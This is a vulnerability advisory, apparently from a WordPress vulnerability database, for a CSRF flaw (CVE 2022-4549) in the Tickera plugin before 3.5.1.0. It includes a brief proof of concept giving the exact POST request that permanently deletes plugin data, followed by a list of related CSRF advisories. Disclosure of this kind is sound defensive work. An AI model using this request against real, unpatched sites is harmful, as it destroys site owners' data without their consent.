Tickera < 3.5.1.0 – Plugin Data Deletion via CSRF | CVE 2022-4549 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.

Proof of Concept

1. Navigate to Tickera Settings » Delete info
2. Delete info request intercept like that

POST /wp-admin/edit.php?post_type=tc_events&page=tc_settings&tab=tickera_delete_info

tc_delete_plugin_data%5Btickera%5D=yes&tc_delete_selected_data_permanently=Delete+selected+data+permanently

Affects Plugins

tickera-event-ticketing-system

Fixed in 3.5.1.0

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

rezaduty

Submitter

rezaduty

Verified

Yes

WPVDB ID

06e1be38-fc1a-4799-a006-556b678ae701

Timeline

Publicly Published

2022-12-23 (about 3 years ago)

Added

2022-12-23 (about 3 years ago)

Last Updated

2024-01-26 (about 1 year ago)

Other

Published

Title

Published

2025-01-24

Title

Linet ERP-Woocommerce Integration < 3.5.8 - Cross-Site Request Forgery

Published

2023-02-21

Title

Educare - Students & Result Management System < 1.4.4 - Cross-Site Request Forgery (CSRF)

Published

2025-11-10

Title

USB Qr Code Scanner For Woocommerce <= 1.0.0 - Cross-Site Request Forgery to Settings Update

Published

2024-01-08

Title

Metform Elementor Contact Form Builder < 3.8.2 - Cross-Site Request Forgery

Published

2023-11-07

Title

WP Links Page < 4.9.5 - Cross-Site Request Forgery via wplf_ajax_update_screenshots